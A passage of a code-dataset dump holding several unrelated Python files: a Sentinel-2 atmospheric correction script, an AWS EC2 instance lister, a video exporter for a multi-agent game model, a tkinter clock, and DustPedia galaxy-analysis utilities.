'http://www2.geog.ucl.ac.uk/~ucfafyi/emus/'\n req = requests.get(url)\n to_down = []\n for line in req.text.split():\n if 'MSI' in line:\n fname = line.split('\"')[1].split('<')[0]\n if 'MSI' in fname:\n to_down.append([fname, url])\n f = lambda fname_url: downloader(fname_url[0], fname_url[1], file_path + '/emus/')\n parmap(f, to_down)\n rets = s2_pre_processing(s2_t)\n aero_atmos = []\n for ret in rets:\n ret += (mcd43, vrt_dir, aoi, global_dem, cams_dir, jasmin)\n aero_atmo = do_correction(*ret)\n if send_back:\n aero_atmos.append(aero_atmo)\n if send_back:\n return aero_atmos\n\ndef do_correction(sun_ang_name, view_ang_names, toa_refs, cloud_name, \\\n cloud_mask, metafile, mcd43 = home + '/MCD43/', vrt_dir = home + '/MCD43_VRT/', aoi=None, \\\n global_dem = '/vsicurl/http://www2.geog.ucl.ac.uk/~ucfafyi/eles/global_dem.vrt', \\\n cams_dir = '/vsicurl/http://www2.geog.ucl.ac.uk/~ucfafyi/cams/', jasmin = False):\n if jasmin:\n global_dem = '/work/scratch/marcyin/DEM/global_dem.vrt'\n cams_dir = '/work/scratch/marcyin/CAMS/'\n os.environ['jasmin_memory_limit'] = '6.4e+10'\n #vrt_dir = '/work/scratch/marcyin/MCD43_VRT/'\n if os.path.realpath(mcd43) in os.path.realpath(home + '/MCD43/'):\n if not os.path.exists(home + '/MCD43/'):\n os.mkdir(home + '/MCD43/')\n\n if os.path.realpath(vrt_dir) in os.path.realpath(home + '/MCD43_VRT/'):\n if not os.path.exists(home + '/MCD43_VRT/'):\n os.mkdir(home + '/MCD43_VRT/')\n\n base = os.path.dirname(toa_refs[0])\n base = toa_refs[0].replace('B01.jp2', '')\n with open(metafile) as f:\n for i in f.readlines():\n if 'SENSING_TIME' in i:\n sensing_time = i.split('')[-1]\n obs_time = datetime.strptime(sensing_time, u'%Y-%m-%dT%H:%M:%S.%fZ')\n if 'TILE_ID' in i:\n sat = i.split('')[-1].split('_')[0]\n tile = i.split('')[-1]\n log_file = os.path.dirname(metafile) + '/SIAC_S2.log'\n logger = create_logger(log_file)\n logger.info('Starting atmospheric corretion for %s'%tile)\n if not np.all(cloud_mask):\n handlers = logger.handlers[:]\n for handler in handlers:\n handler.close()\n logger.removeHandler(handler)\n #if not jasmin:\n vrt_dir = get_mcd43(toa_refs[0], obs_time, mcd43_dir = mcd43, vrt_dir = 
vrt_dir, log_file = log_file, jasmin = jasmin)\n #logger = create_logger(log_file)\n else:\n logger.info('No clean pixel in this scene and no MCD43 is downloaded.')\n sensor_sat = 'MSI', sat\n band_index = [1,2,3,7,11,12]\n band_wv = [469, 555, 645, 859, 1640, 2130]\n toa_bands = (np.array(toa_refs)[band_index,]).tolist()\n view_angles = (np.array(view_ang_names)[band_index,]).tolist()\n sun_angles = sun_ang_name\n #logger.info('Running SIAC for tile: %s on %s'%(tile, obs_time.strftime('%Y-%M-%d')))\n aero = solve_aerosol(sensor_sat,toa_bands,band_wv, band_index,view_angles,\\\n sun_angles,obs_time,cloud_mask, gamma=10., spec_m_dir= \\\n file_path+'/spectral_mapping/', emus_dir=file_path+'/emus/', \\\n mcd43_dir=vrt_dir, aoi=aoi, log_file = log_file, global_dem = global_dem, cams_dir = cams_dir)\n aero._solving()\n toa_bands = toa_refs\n view_angles = view_ang_names\n aot = base + 'aot.tif'\n tcwv = base + 'tcwv.tif'\n tco3 = base + 'tco3.tif'\n aot_unc = base + 'aot_unc.tif'\n tcwv_unc = base + 'tcwv_unc.tif'\n tco3_unc = base + 'tco3_unc.tif'\n rgb = [toa_bands[3], toa_bands[2], toa_bands[1]]\n band_index = [0,1,2,3,4,5,6,7,8,9,10,11,12]\n atmo = atmospheric_correction(sensor_sat,toa_bands, band_index,view_angles,\\\n sun_angles, aot = aot, cloud_mask = cloud_mask,\\\n tcwv = tcwv, tco3 = tco3, aot_unc = aot_unc, \\\n tcwv_unc = tcwv_unc, tco3_unc = tco3_unc, rgb = \\\n rgb, emus_dir=file_path+'/emus/', log_file = log_file, global_dem = global_dem, cams_dir = cams_dir)\n atmo._doing_correction()\n if jasmin:\n shutil.rmtree(vrt_dir)\n return aero, atmo\n\ndef exe():\n parser = argparse.ArgumentParser(description='Sentinel 2 Atmospheric Correction Excutable')\n parser.add_argument('-f', \"--file_path\", help='Sentinel 2 file path', required=True)\n parser.add_argument(\"-m\", \"--MCD43_file_dir\", help=\"Directory where you store MCD43A1.006 data\", default = home + '/MCD43/')\n parser.add_argument(\"-v\", \"--vrt_dir\", help=\"Where MCD43 vrt stored.\", default = home + '/MCD43_VRT/')\n parser.add_argument(\"-a\", \"--aoi\", help=\"Area of Interest.\", default = None)\n args = parser.parse_args()\n SIAC_S2(s2_t=args.file_path, mcd43=args.MCD43_file_dir, vrt_dir=args.vrt_dir, aoi=args.aoi)\n\nif __name__ == '__main__':\n exe()\n\n","repo_name":"MarcYin/MT_SIAC","sub_path":"MT_SIAC/SIAC_S2.py","file_name":"SIAC_S2.py","file_ext":"py","file_size_in_byte":6296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74481765384","text":"# index.py\n#\n# Author: Ryan Russell\n# Purpose: List all EC2 instances from regions in an AWS account.\n# Filter for instance_state and Tag\n# Runtime: Python 3.6\n# Input: None\n# Output: Result object list of all regions with instances matching filters\n# Other Dependencies: IAM Permissions for:\n# - ec2:DescribeInstances\n# - ec2:DescribeRegions\n# \n\nimport time, os, boto3\n\n# Define instance states to filter by\nINSTANCE_STATE = ['stopped']\n\n# Define tag environment variable\nTAG_ENV_VAR = 'EC2_TAG'\n\n# For use with AWS Lambda\ndef lambda_handler(event, context):\n\n start = time.time() # Begin execution timer\n\n client = boto3.client('ec2')\n \n result = { } # Search Result Object\n response = { } # JSON object response\n response['filters'] = { } # Filter object (JSON response)\n \n # Get the region list from AWS\n regions = [region['RegionName'] for region in client.describe_regions()['Regions']]\n \n # Build the filter object\n ec2_filter = [{\n 'Name': 'instance-state-name',\n 'Values': 
INSTANCE_STATE\n }]\n response['filters']['instance-state-name'] = ec2_filter[0]['Values']\n \n # Look for the tag filter from the environment variables. \n try:\n tag = os.environ[TAG_ENV_VAR]\n response['filters']['ec2_tag'] = tag\n ec2_filter.append({\n 'Name': 'tag-key',\n 'Values':[tag]\n })\n print('EC2_TAG: ' + tag)\n except:\n response['filters']['ec2_tag'] = None\n print('No EC2 Tag Defined. Listing all.')\n \n print('Looking for instances in all regions...')\n \n # Start search against AWS\n for i in range(0,len(regions)):\n result[regions[i]] = [ ]\n client = boto3.client('ec2',region_name=regions[i])\n instances = client.describe_instances(Filters=ec2_filter)\n \n # If instances are present in the describe_instances response\n if len(instances['Reservations']) > 0 :\n print(regions[i] + ':')\n for j in range(0,len(instances['Reservations'])):\n for k in range(0,len(instances['Reservations'][j]['Instances'])):\n result[regions[i]].append(instances['Reservations'][j]['Instances'][k]['InstanceId'])\n print(' ' + instances['Reservations'][j]['Instances'][k]['InstanceId'])\n \n # If no instances found\n else:\n print(regions[i] + ': No Instances Found')\n \n print('Instance Search Complete')\n \n print('Filters: ' + str(response['filters']))\n \n #Build JSON response object\n response['instances'] = result\n response['version'] = \"0.2.0\"\n response['timestampGMT'] = time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", time.gmtime())\n print('Timestamp: ' + response['timestampGMT'])\n \n end = time.time() # End execution timer\n response['executionTimeSec'] = end - start\n print('Execution Time: ' + str(response['executionTimeSec']) + 's')\n \n return response # Return JSON response object\n \n# For use with command line\n# $ python3 \nif __name__ == '__main__':\n lambda_handler(None,None)","repo_name":"arsci/aws-ec2-find-instances","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24366842546","text":"# Video exporter for use with rescue game\n\nimport os\nimport cv2\nimport utils\nimport torch\nimport numpy as np\nimport shutil\n\nfrom typing import Union\n\nfrom rescue import RescueTheGeneralEnv\nfrom train import make_env\nfrom algorithms import PMAlgorithm\nfrom utils import draw_pixel\n\ndef display_role_prediction(frame: np.ndarray, dx: int, dy: int, raw_predictions, env:RescueTheGeneralEnv):\n \"\"\"\n :param dx: draw location\n :param dy: draw location\n :param raw_predictions: nd array of dims [n_players, n_players, n_roles]\n :return:\n \"\"\"\n\n n_players = len(raw_predictions)\n\n # format the role predictions\n role_predictions = np.exp(raw_predictions)\n\n block_size = 8\n for i in range(n_players):\n draw_pixel(frame, dy, dx + (i + 1) * block_size, c=env.players[i].team_color,\n size=block_size) # indicate roles\n draw_pixel(frame, dy + (i + 1) * block_size, dx, c=env.players[i].id_color,\n size=block_size) # indicate roles\n\n for i in range(n_players):\n for j in range(n_players):\n c = [int(x * 255) for x in role_predictions[i, j]]\n draw_pixel(frame, dy + (i + 1) * block_size, dx + (j + 1) * block_size, c=c, size=block_size)\n\ndef display_policy(frame: np.ndarray, dx:int, dy:int, policy: np.ndarray,\n action: Union[int, None] = None,\n prev_action: Union[int, None] = None,\n\n ):\n \"\"\"\n :param frame:\n :param dx:\n :param dy:\n :param policy: nd array of dims [n_roles, n_actions] as probability distribution (0..1)\n 
:param action: (optional) the action the player took\n :return:\n \"\"\"\n n_roles, n_actions = policy.shape\n\n base_colors = np.asarray([\n (0.3, 0.3, 0.3), # no-op\n (0.1, 0.1, 0.1), # move\n (0.1, 0.1, 0.1), # move\n (0.1, 0.1, 0.1), # move\n (0.1, 0.1, 0.1), # move\n (0.3, 0.3, 0.3), # act\n (0.1, 0.1, 0.1), # shoot\n (0.1, 0.1, 0.1), # shoot\n (0.1, 0.1, 0.1), # shoot\n (0.1, 0.1, 0.1), # shoot\n\n ])\n\n for r in range(n_roles):\n on_color = np.asarray((0.0, 0.0, 0.0))\n on_color[r] = 1.0\n for a in range(n_actions):\n weight = policy[r, a]\n c = weight * on_color\n frame[dy + r, dx + a] = (c*255).astype(np.uint8)\n\n for a in range(n_actions):\n # show markers at bottom indicating what is what\n if a < len(base_colors):\n c = base_colors[a]\n else:\n c = 0.0\n if action is not None and a == action:\n c = 0.8 # indicate which action the player took.\n elif prev_action is not None and a == prev_action:\n c = 0.5 # show the previous action too, if required (useful for deception bonus)\n\n c = np.asarray(c)\n\n frame[dy + n_roles, dx + a] = (c * 255).astype(np.uint8)\n\ndef export_video(filename, algorithm: PMAlgorithm, scenario):\n \"\"\"\n Exports a movie of model playing in given scenario\n \"\"\"\n\n scale = 8\n n_roles = 3\n\n # make a new environment so we don't mess the settings up on the one used for training.\n # it also makes sure that results from the video are not included in the log\n vec_env = make_env(scenario, parallel_envs=1, name=\"video\")\n\n env_obs = vec_env.reset()\n env = vec_env.games[0]\n frame = env.render(\"rgb_array\")\n\n obs_size = env.observation_space.shape[1] # stub, make this a shape and get from env\n n_players = len(env.players)\n n_actions = vec_env.action_space.n\n\n # work out our height\n height, width, channels = frame.shape\n orig_height, orig_width = height, width\n\n if algorithm.uses_deception_model:\n\n if algorithm.predicts_observations:\n prediction_display_width = obs_size\n prediction_display_height = obs_size\n else:\n prediction_display_width = (n_actions + 1) + 8\n prediction_display_height = (n_roles + 1) + 8\n\n # make room for predictions\n role_prediction_space = (n_players + 2) * 8 * 2\n width = max(width + role_prediction_space , (n_players * 2 + 1) * prediction_display_width)\n\n # make room for other predictions\n if algorithm.predicts_observations:\n height = height + n_players * prediction_display_height\n if algorithm.predicts_actions:\n height = height + n_players * prediction_display_height\n\n scaled_width = (width * scale) // 4 * 4 # make sure these are multiples of 4\n scaled_height = (height * scale) // 4 * 4\n\n # create video recorder\n video_out = cv2.VideoWriter(filename, cv2.VideoWriter_fourcc(*'mp4v'), 8, (scaled_width, scaled_height),\n isColor=True)\n\n # this is required to make sure the last frame is visible\n vec_env.auto_reset = False\n\n rnn_state = algorithm.get_initial_rnn_state(len(env.players))\n\n last_outcome = \"\"\n bonus = None\n\n def channels_first_to_last(x):\n \"\"\"\n Swap from chw to whc\n :param x:\n :return:\n \"\"\"\n return x.swapaxes(0, 2)\n\n actions = np.zeros([len(vec_env.players)], dtype=np.long)\n\n # play the game...\n while last_outcome == \"\":\n\n last_outcome = env.round_outcome\n prev_actions = actions.copy()\n\n with torch.no_grad():\n roles = vec_env.get_roles()\n obs_truth = env_obs.copy()\n model_output, new_rnn_state = algorithm.forward(\n torch.from_numpy(env_obs),\n rnn_state,\n torch.from_numpy(roles)\n )\n\n rnn_state[:] = new_rnn_state\n\n log_policy = 
model_output[\"log_policy\"].detach().cpu().numpy()\n actions = utils.sample_action_from_logp(log_policy)\n\n # generate frames from global perspective\n frame = env.render(\"rgb_array\")\n\n blank_frame = np.zeros([height, width, 3], dtype=np.uint8)\n blank_frame[:frame.shape[0], :frame.shape[1], :] = frame # copy into potentially larger frame\n frame = blank_frame\n\n # add additional parts based on the output of the model\n if \"role_prediction\" in model_output:\n role_predictions = model_output[\"role_prediction\"].detach().cpu().numpy()\n display_role_prediction(frame, orig_width, 10, role_predictions, env)\n\n if \"policy_role_prediction\" in model_output:\n role_predictions = model_output[\"policy_role_prediction\"].detach().cpu().numpy()\n display_role_prediction(frame, orig_width, 60, role_predictions, env)\n\n if \"role_backwards_prediction\" in model_output:\n backwards_role_predictions = model_output[\"role_backwards_prediction\"].detach().cpu().numpy()\n backwards_role_predictions_transposed = backwards_role_predictions.swapaxes(0, 1)\n display_role_prediction(frame, orig_width + (n_players + 2) * 8, 10, backwards_role_predictions_transposed, env)\n\n if \"obs_prediction\" in model_output:\n # ground truth\n for i in range(n_players):\n dx = 0\n dy = orig_height + i * obs_size\n frame[dy:dy + obs_size, dx:dx + obs_size] = channels_first_to_last(obs_truth[i])\n\n # predictions\n # observation frames are [n_players, n_predictions, c, h, w]\n obs_predictions = model_output[\"obs_prediction\"].detach().cpu().numpy()\n n_players, n_predictions, c, h, w = obs_predictions.shape\n for i in range(n_players):\n for j in range(n_predictions):\n dx = j * obs_size + obs_size\n dy = orig_height + i * obs_size\n predictions_transposed = channels_first_to_last(np.asarray(obs_predictions[i, j] * 255, dtype=np.uint8))\n frame[dy:dy + obs_size, dx:dx + obs_size] = predictions_transposed\n\n if \"obs_backwards_prediction\" in model_output:\n obs_pp = model_output[\"obs_backwards_prediction\"].detach().cpu().numpy()\n for i in range(n_players):\n for j in range(n_players):\n dx = j * obs_size + (obs_size * (n_players + 1))\n dy = orig_height + i * obs_size\n # we transpose as rescue is x,y instead of y,x\n predictions_transposed = channels_first_to_last(np.asarray(obs_pp[j, i] * 255, dtype=np.uint8))\n frame[dy:dy + obs_size, dx:dx + obs_size] = predictions_transposed\n\n if \"action_prediction\" in model_output:\n action_predictions = np.exp(model_output[\"action_prediction\"].detach().cpu().numpy())\n action_prediction_predictions = np.exp(model_output[\"action_backwards_prediction\"].detach().cpu().numpy())\n true_policy = np.exp(model_output[\"role_log_policy\"].detach().cpu().numpy())\n _, _, _, n_actions = action_predictions.shape\n\n # these come out as n_players, n_players, n_roles, n_actions ?\n policy_spacing_y = (n_roles+2)\n\n # true policy\n for i in range(n_players):\n dx = 0 * (n_actions+1) + 4\n dy = orig_height + i * policy_spacing_y\n display_policy(frame, dx, dy, true_policy[i], actions[i], prev_actions[i])\n\n # predicted policy\n for i in range(n_players):\n for j in range(n_players):\n dx = (j+1) * (n_actions+1) + 8\n dy = orig_height + i * policy_spacing_y\n display_policy(frame, dx, dy, action_predictions[i, j])\n\n # predictions of other players predictions of our own policy\n for i in range(n_players):\n for j in range(n_players):\n dx = (n_players+(j+1)) * (n_actions+1) + 12\n dy = orig_height + i * policy_spacing_y\n display_policy(frame, dx, dy, 
action_prediction_predictions[i, j])\n\n # add deception bonus indicators (on top of role prediction)\n if bonus is not None:\n\n for i in range(n_players):\n dx = orig_width\n dy = 10 + (i + 1) * 8\n for scale in [0, 1, 2]:\n\n factor = bonus[i] / (10 ** (2 - scale))\n\n if factor > 0:\n c = np.asarray((factor, 0.0, 0.0), np.float)\n else:\n c = np.asarray((0.0, 0.0, -factor), np.float)\n\n c = np.clip(c * 255, 0, 255).astype(np.uint8)\n\n frame[dy+scale+1:dy+8-scale-1, dx+scale+1:dx+8-scale-1] = c\n\n # write time stamp\n utils.draw_numbers(frame, width-4*5, height-6, str(env.round_timer), [255, 255, 255], zero_pad=4)\n\n # for some reason cv2 wants BGR instead of RGB\n frame[:, :, :] = frame[:, :, ::-1]\n\n if frame.shape[0] != scaled_width or frame.shape[1] != scaled_height:\n frame = cv2.resize(frame, (scaled_width, scaled_height), interpolation=cv2.INTER_NEAREST)\n\n assert \\\n frame.shape[1] == scaled_width and frame.shape[0] == scaled_height, \\\n \"Frame should be {} but is {}\".format((scaled_width, scaled_height, 3), frame.shape)\n\n video_out.write(frame)\n\n # step environment\n if last_outcome == \"\":\n env_obs, env_rewards, env_dones, env_infos = vec_env.step(actions)\n\n # calculate deception bonus\n if algorithm.uses_deception_model and not algorithm.predicts_observations:\n # show bonus, only works on actions at the moment\n # this bonus is for the action we *will* take on the next frame.\n players_visible = []\n for player in env.players:\n vision = [player.in_vision(other_player.x, other_player.y) for other_player in env.players]\n players_visible.append(vision)\n players_visible = np.asarray(players_visible)\n bonus = algorithm.calculate_deception_bonus(model_output, actions, vec_env, roles, players_visible)\n else:\n bonus = None\n\n # write last frame out 10 times\n # this is because some video players terminate at the end of the video making it *very* hard to see the last frame\n # (which is often very important)\n for _ in range(10):\n video_out.write(frame)\n\n video_out.release()\n\n # rename video to include outcome\n try:\n outcome = env.game_outcomes\n # if we only ran one round then remove the unnecessary array brackets\n if type(outcome) == list and len(outcome) == 1:\n outcome = outcome[0]\n modified_filename = f\"{os.path.splitext(filename)[0]} [{outcome}]{os.path.splitext(filename)[1]}\"\n shutil.move(filename, modified_filename)\n except:\n print(\"Warning: could not rename video file.\")\n\n\n\n","repo_name":"maitchison/RTG","sub_path":"video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":12844,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"70255539464","text":"from tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom time import strftime\r\n\r\ndef tkinter_clock():\r\n root = Tk()\r\n root.title(\"Clock\")\r\n root.geometry(\"300x62\")\r\n root.minsize(296, 60)\r\n root.maxsize(302, 63)\r\n root.iconbitmap(\"Computer_icon.ico\")\r\n\r\n def time():\r\n string = strftime(\"%H:%M:%S %p\")\r\n label.config(text=string)\r\n label.after(1000, time)\r\n\r\n label = Label(root, font=(\"lucida\", 40), background=\"black\", foreground=\"cyan\")\r\n label.pack(anchor=\"center\")\r\n time()\r\n mainloop()\r\n\r\n# tkinter_clock()\r\n","repo_name":"UjjwalSaini07/Voice_assistant","sub_path":"Clock_GUI.py","file_name":"Clock_GUI.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} 
+{"seq_id":"16565726963","text":"#!/usr/bin/python\n# -*- coding: latin-1 -*-\n\nimport pandas as pd\nDustPath = '/home/dustpedia/DustFolder/'\nbandwavpath = DustPath+'scripts/bands_and_wvlghts.txt'\ndict_df = pd.read_csv(bandwavpath, delimiter = '\\t')\nWvlghts_dictionary = dict(zip(dict_df['name'], dict_df['lambda_eff']))\n\nclass GalaxyProperties:\n def __init__(self, galaxy_name, table_path = DustPath+'/DustPedia_Tables/DustPedia_HyperLEDA_Herschel.csv', cosmology = 'Planck15'):\n import pandas as pd\n from astropy import units as u\n from astropy.constants import c as v_lux\n if cosmology == 'Planck15':\n from astropy.cosmology import Planck15 as cosmo\n elif cosmology == 'FlatLambdaCDM':\n from astropy.cosmology import FlatLambdaCDM\n cosmo = FlatLambdaCDM(H0=70 * u.km / u.s / u.Mpc, Tcmb0=2.725 * u.K, Om0=0.3) \n \n self.galaxy_name = galaxy_name \n df = pd.read_csv(table_path)\n self.properties_table = df.loc[df['objname'] == self.galaxy_name]\n self.ra = self.properties_table['ra2000'].values[0]*u.deg\n self.dec = self.properties_table['de2000'].values[0]*u.deg\n self.t = self.properties_table['t'].values[0]\n self.d25 = self.properties_table['d25'].values[0]*u.arcmin\n self.incl = self.properties_table['incl'].values[0]\n self.dist = self.properties_table['dist_best'].values[0]*u.Mpc\n self.z_source = cosmo.H0*self.dist/v_lux.to('km/s')\n self.d25_physical = cosmo.kpc_comoving_per_arcmin(self.z_source)*self.d25\n\nclass FitsUtils:\n def __init__(self, signal_path):\n import numpy as np\n from astropy.io import fits, ascii\n from astropy.wcs import WCS\n self.fits_path = signal_path\n self.signal = np.nan_to_num(fits.getdata(self.fits_path))\n self.signal_with_nans = fits.getdata(self.fits_path)\n self.hdr = fits.getheader(self.fits_path)\n self.wcs = WCS(self.hdr)\n \n if signal_path.rsplit('/',1)[-1][0:3] == 'NGC': self.bandname = signal_path.rsplit('/',1)[1][8:-5]\n else: self.bandname = signal_path.rsplit('/',1)[1][:-5]\n \n error_path = signal_path.rsplit('/',1)[0]+'/ERROR_MAPS/'+signal_path.rsplit('/',1)[-1]\n error_path = error_path.rsplit('.',1)[0]+'_Error.'+error_path.rsplit('.',1)[1]\n try:\n self.errormap = fits.getdata(error_path)\n except:\n self.errormap = 0\n \n def get_pixel_scale(self):\n import numpy as np\n if ('CDELT1' in self.hdr) & ('CDELT2' in self.hdr):\n pixel_scale_x=abs(self.hdr['CDELT1'])\n pixel_scale_y=abs(self.hdr['CDELT2'])\n elif ('CD1_1' in self.hdr) & ('CD1_2' in self.hdr) & \\\n ('CD2_1' in self.hdr) & ('CD2_2' in self.hdr):\n _ = np.arctan(self.hdr['CD2_1']/self.hdr['CD1_1'])\n pixel_scale_x = abs(self.hdr['CD1_1']/np.cos(_))\n pixel_scale_y = abs(self.hdr['CD2_2']/np.cos(_))\n else:\n raise ValueError\n pixel_scale = np.sqrt(pixel_scale_x*pixel_scale_y)\n return pixel_scale\n \n def get_wavelength(self):\n return Wvlghts_dictionary[self.bandname]\n\nclass AngularPhysicalConv:\n \n def __init__(self, z_source, cosmology_name = 'Planck15'):\n if cosmology_name == 'Planck15':\n from astropy.cosmology import Planck15 as cosmo\n elif cosmology_name == 'FlatLambdaCDM':\n from astropy.cosmology import FlatLambdaCDM\n cosmo = FlatLambdaCDM(H0=70 * u.km / u.s / u.Mpc, Tcmb0=2.725 * u.K, Om0=0.3)\n else: raise ValueError('You should give a valid cosmology name.')\n \n self.cosmo = cosmo\n \n from astropy import units as u\n self.z_source = z_source\n\n def P2A(self, physical):\n try: _ = physical.unit\n except: raise ValueError('Physical quantity should have a unit.')\n \n if physical.unit == 'arcsec' or physical.unit == 'arcmin' or physical.unit == 
'deg':\n raise ValueError('Give physical quantity, not angular, mona.')\n\n if physical.unit == 'pc': physical = physical.to('kpc')\n elif physical.unit == 'Mpc': physical = physical.to('kpc')\n angular = physical*self.cosmo.arcsec_per_kpc_comoving(self.z_source)\n return angular\n \n def A2P(self, angular):\n try: _ = angular.unit\n except: raise ValueError('Angular quantity should have a unit.')\n \n if angular.unit == 'pc' or angular.unit == 'kpc':\n raise ValueError('Give angular quantity, not physical, mona.')\n \n if angular.unit == 'arcsec': angular = angular.to('arcmin')\n elif angular.unit == 'deg': angular = angular.to('arcmin')\n physical = angular*self.cosmo.kpc_comoving_per_arcmin(self.z_source)\n return physical\n\nclass ManageTable:\n\n def __init__(self, galaxy_name, properties_path, table_path, chisq_threshold = 25):\n import sys\n sys.path.insert(0, '../') # To import Dustpedia Scripts\n sys.path.insert(0, '../scripts/') # To import Dustpedia Scripts\n import DustpediaScripts as DS\n import pandas as pd\n import numpy as np\n from astropy.cosmology import Planck15 as cosmo\n from astropy import units as u\n from astropy.constants import c as v_lux\n\n self.properties_path = properties_path\n self.galaxy_name = galaxy_name \n df = pd.read_csv(properties_path)\n self.properties_table = df.loc[df['objname'] == self.galaxy_name]\n self.ra = self.properties_table['ra2000'].values[0]*u.deg\n self.dec = self.properties_table['de2000'].values[0]*u.deg\n self.t = self.properties_table['t'].values[0]\n self.r25 = .5*self.properties_table['d25'].values[0]*u.arcmin\n self.incl = self.properties_table['incl'].values[0]\n self.dist = self.properties_table['dist_best'].values[0]*u.Mpc\n self.z_source = cosmo.H0*self.dist/v_lux.to('km/s')\n self.r25_physical = cosmo.kpc_comoving_per_arcmin(self.z_source)*self.r25\n\n # Read Pixels Properties\n self.table_path = table_path\n self.table = pd.read_csv(self.table_path, sep = '\\,', dtype={'Id. 
Aperture': object})\n self.chisq_threshold = chisq_threshold\n self.GOOD_chisq = np.where(self.table.Bestfit_Chisq < self.chisq_threshold)[0]\n self.BAD_chisq = np.where(self.table.Bestfit_Chisq >= self.chisq_threshold)[0]\n\n def update_MSdistance(self, fit_m, fit_q):\n import sys\n sys.path.insert(0, '../') # To import Dustpedia Scripts\n import DustpediaScripts as DS\n import numpy as np\n x, y = np.log10(self.table.SigmaMstar), np.log10(self.table.SigmaSFR)\n self.table['MS_distance'] = DS.shortest_distance(x, y, fit_m, fit_q)\n return\n\n def update_MSdistance(self, fit_m, fit_q):\n import sys\n sys.path.insert(0, '../') # To import Dustpedia Scripts\n import DustpediaScripts as DS\n import numpy as np\n x, y = np.log10(self.table.SigmaMstar), np.log10(self.table.SigmaSFR)\n self.table['MS_distance'] = DS.shortest_distance(x, y, fit_m, fit_q)\n return\n \n def update_MSdistance_ODR(self, fit_m, fit_q):\n import sys\n sys.path.insert(0, '../') # To import Dustpedia Scripts\n import DustpediaScripts as DS\n import numpy as np\n x, y = np.log10(self.table.SigmaMstar), np.log10(self.table.SigmaSFR)\n self.table['MS_distance_ODR'] = DS.shortest_distance(x, y, fit_m, fit_q)\n return\n \n def update_autoMSdistance(self, logSFR_limit = False):\n import sys\n sys.path.insert(0, '../') # To import Dustpedia Scripts\n import DustpediaScripts as DS\n import numpy as np\n from scipy import odr\n linear = odr.Model(DS.linear_function)\n x, y = np.log10(self.table.SigmaMstar[self.GOOD_chisq]), np.log10(self.table.SigmaSFR[self.GOOD_chisq])\n if logSFR_limit != False:\n ok = np.where(y >= logSFR_limit)\n x, y = x[ok], y[ok]\n\n MYodr = odr.ODR(odr.RealData(x, y), linear, beta0=[1,1])\n MYresults = MYodr.run()\n x, y = np.log10(self.table.SigmaMstar), np.log10(self.table.SigmaSFR)\n self.table['autoMS_distance'] = DS.shortest_distance(x, y, MYresults.beta[0], MYresults.beta[1])\n return MYresults.beta[0], MYresults.beta[1]\n \n def save_table(self, save_table_path, update = False):\n import pandas as pd\n import numpy as np\n if update == True: self.table.to_csv(self.table_path, index = False, sep = ',')\n else: self.table.to_csv(save_table_path, index = False, sep = ',')\n return\n \n def apply_M51b_mask(self):\n import numpy as np\n from astropy import units as u\n BAD_5194 = np.where(self.dec > 47.24052*u.deg)\n self.table.bestfit_chisq[BAD_5194] = 50\n self.GOOD_chisq = np.where(self.table.Bestfit_Chisq < self.chisq_threshold)\n self.BAD_chisq = np.where(self.table.Bestfit_Chisq >= self.chisq_threshold)\n return\n\n def apply_radius_threshold(self, radius_threshold):\n import numpy as np\n from astropy import units as u\n BAD = np.where(self.table.cendist_physical > radius_threshold.value)\n self.table.bestfit_chisq[BAD] = 100\n self.GOOD_chisq = np.where(self.table.Bestfit_Chisq < self.chisq_threshold)\n self.BAD_chisq = np.where(self.table.Bestfit_Chisq >= self.chisq_threshold)\n return\n \nimport numpy as np\nimport os, subprocess\n\ndef band_disambiguation(band):\n if band == 'GALEX_FUV' or band == 'GALEX FUV': return 'GALEXFUV'\n if band == 'GALEX_NUV' or band == 'GALEX NUV': return 'GALEXNUV'\n if band == 'SDSS u' or band == 'Sloan u': return 'SDSS_u'\n if band == 'SDSS g' or band == 'Sloan g': return 'SDSS_g'\n if band == 'SDSS r' or band == 'Sloan r': return 'SDSS_r'\n if band == 'SDSS i' or band == 'Sloan i': return 'SDSS_i'\n if band == 'SDSS z' or band == 'Sloan z': return 'SDSS_z'\n if band == '2MASS_J' or band == '2MASS J': return 'J'\n if band == '2MASS_H' or band == '2MASS H': 
return 'H'\n if band == '2MASS_Ks' or band == '2MASS Ks' or band == '2MASS K': return 'Ks'\n if band == 'WISE_3.4' or band == 'WISE 3.4': return 'WISEW1'\n if band == 'WISE_4.6' or band == 'WISE 4.6': return 'WISEW2'\n if band == 'WISE_12' or band == 'WISE 12': return 'WISEW3'\n if band == 'WISE_22' or band == 'WISE 22': return 'WISEW4'\n if band == 'Spitzer_3.6' or band == 'Spitzer 3.6': return 'IRAC1'\n if band == 'Spitzer_4.5' or band == 'Spitzer 4.5': return 'IRAC2'\n if band == 'Spitzer_5.8' or band == 'Spitzer 5.8': return 'IRAC3'\n if band == 'Spitzer_8.0' or band == 'Spitzer 8.0': return 'IRAC4'\n if band == 'Spitzer_24' or band == 'Spitzer 24': return 'MIPS24'\n if band == 'Spitzer_70' or band == 'Spitzer 70': return 'MIPS70'\n if band == 'Spitzer_160' or band == 'Spitzer 160': return 'MIPS160'\n if band == 'PACS_70' or band == 'PACS 70': return 'PACS70'\n if band == 'PACS_100' or band == 'PACS 100': return 'PACS100'\n if band == 'PACS_160' or band == 'PACS 160': return 'PACS160'\n if band == 'SPIRE_250' or band == 'SPIRE 250': return 'SPIRE250'\n if band == 'SPIRE_350' or band == 'SPIRE 350': return 'SPIRE350'\n if band == 'SPIRE_500' or band == 'SPIRE 500': return 'SPIRE500'\n if band == 'SMA' or band == 'SMA_800': return 'SMA800'\n return band\n\ndef associate_colormap(band):\n from matplotlib import cm\n band = band_disambiguation(band)\n if band == 'GALEXFUV' or band == 'GALEXNUV': return cm.bone\n if band == 'SDSS_u' or band == 'SDSS_g' or band == 'SDSS_r' \\\n or band == 'SDSS_i' or band == 'SDSS_z': return cm.gray\n if band == 'J' or band == 'H' or band == 'Ks': return 